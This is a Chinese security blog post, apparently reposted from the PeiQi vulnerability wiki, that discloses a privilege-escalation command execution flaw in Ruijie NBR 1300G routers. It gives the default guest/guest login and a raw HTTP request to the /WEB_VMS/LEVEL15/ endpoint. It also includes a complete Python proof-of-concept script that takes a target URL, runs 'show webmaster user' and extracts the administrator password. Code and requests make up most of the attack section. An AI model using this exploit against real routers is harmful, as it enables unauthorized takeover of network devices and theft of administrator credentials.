锐捷NBR 1300G路由器 越权CLI命令执行漏洞

admin 2021年5月3日05:09:09评论766 views字数 2663阅读8分52秒阅读模式

锐捷NBR 1300G路由器 越权CLI命令执行漏洞

锐捷NBR 1300G路由器 越权CLI命令执行漏洞


:漏洞描述🐑


锐捷NBR 1300G路由器 越权CLI命令执行漏洞,guest账户可以越权获取管理员账号密码


二:  漏洞影响🐇


锐捷NBR路由器


三:  漏洞复现🐋

登录页面如下

锐捷NBR 1300G路由器 越权CLI命令执行漏洞

查看流量发现 CLI命令流量

锐捷NBR 1300G路由器 越权CLI命令执行漏洞

POST /WEB_VMS/LEVEL15/ HTTP/1.1Host: Connection: keep-aliveContent-Length: 73Authorization: BasicUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Content-Type: text/plain;charset=UTF-8Accept: */*Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6Cookie: auth=; user=x-forwarded-for: 127.0.0.1x-originating-ip: 127.0.0.1x-remote-ip: 127.0.0.1x-remote-addr: 127.0.0.1
command=show version&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.

测试发现执行其他命令需要权限,查看手册发现存在低权限 guest账户(guest/guest)

登录后发送请求包,执行CLI命令 (show webmaster user) 查看用户配置账号密码

锐捷NBR 1300G路由器 越权CLI命令执行漏洞

成功获取所有用户的账号密码


 四:  漏洞POC🦉

#!/usr/bin/python3#-*- coding:utf-8 -*-# author : PeiQi# from   : http://wiki.peiqi.tech
import base64import requestsimport randomimport reimport jsonimport sys
def title(): print('+------------------------------------------') print('+ 33[34mPOC_Des: http://wiki.peiqi.tech 33[0m') print('+ 33[34mGithub : https://github.com/PeiQi0 33[0m') print('+ 33[34m公众号 : PeiQi文库 33[0m') print('+ 33[34mVersion: 锐捷NBRNBR1300G 路由器 越权CLI命令执行漏洞 33[0m') print('+ 33[36m使用格式: python3 poc.py 33[0m') print('+ 33[36mUrl >>> http://xxx.xxx.xxx.xxx 33[0m') print('+------------------------------------------')
def POC_1(target_url): vuln_url = target_url + "/WEB_VMS/LEVEL15/" headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36", "Content-Type": "application/x-www-form-urlencoded", "Authorization": "Basic Z3Vlc3Q6Z3Vlc3Q=" } data = 'command=show webmaster user&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.' try: response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=10) print("33[36m[o] 正在执行 show webmaster user 33[0m".format(target_url)) if "webmaster" in response.text and " password" in response.text and response.status_code == 200: user_data = re.findall(r'webmaster level 0 username admin password (.*?)<OPTION>', response.text)[0] print("33[36m[o] 成功获取, 管理员用户账号密码为: admin/{} 33[0m".format(user_data)) else: print("33[31m[x] 请求失败:{} 33[0m") except Exception as e: print("33[31m[x] 请求失败:{} 33[0m".format(e)) sys.exit(0)

if __name__ == '__main__': title() target_url = str(input("33[35mPlease input Attack UrlnUrl >>> 33[0m"))    POC_1(target_url)

锐捷NBR 1300G路由器 越权CLI命令执行漏洞


 五:  关于文库🦉



    在线文库:

http://wiki.peiqi.tech


    Github:

https://github.com/PeiQi0/PeiQi-WIKI-POC

锐捷NBR 1300G路由器 越权CLI命令执行漏洞


最后

下面就是文库的公众号啦,更新的文章都会在第一时间推送在交流群和公众号

想要加入交流群的师傅公众号点击交流群加我拉你啦~

别忘了Github下载完给个小星星⭐


同时知识星球也开放运营啦,希望师傅们支持支持啦🐟

知识星球里会持续发布0~1day漏洞和技术文章~

锐捷NBR 1300G路由器 越权CLI命令执行漏洞


由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。


PeiQi文库 拥有对此文章的修改和解释权如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。


本文始发于微信公众号(PeiQi文库):锐捷NBR 1300G路由器 越权CLI命令执行漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年5月3日05:09:09
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   锐捷NBR 1300G路由器 越权CLI命令执行漏洞http://cn-sec.com/archives/365412.html

发表评论

匿名网友 填写信息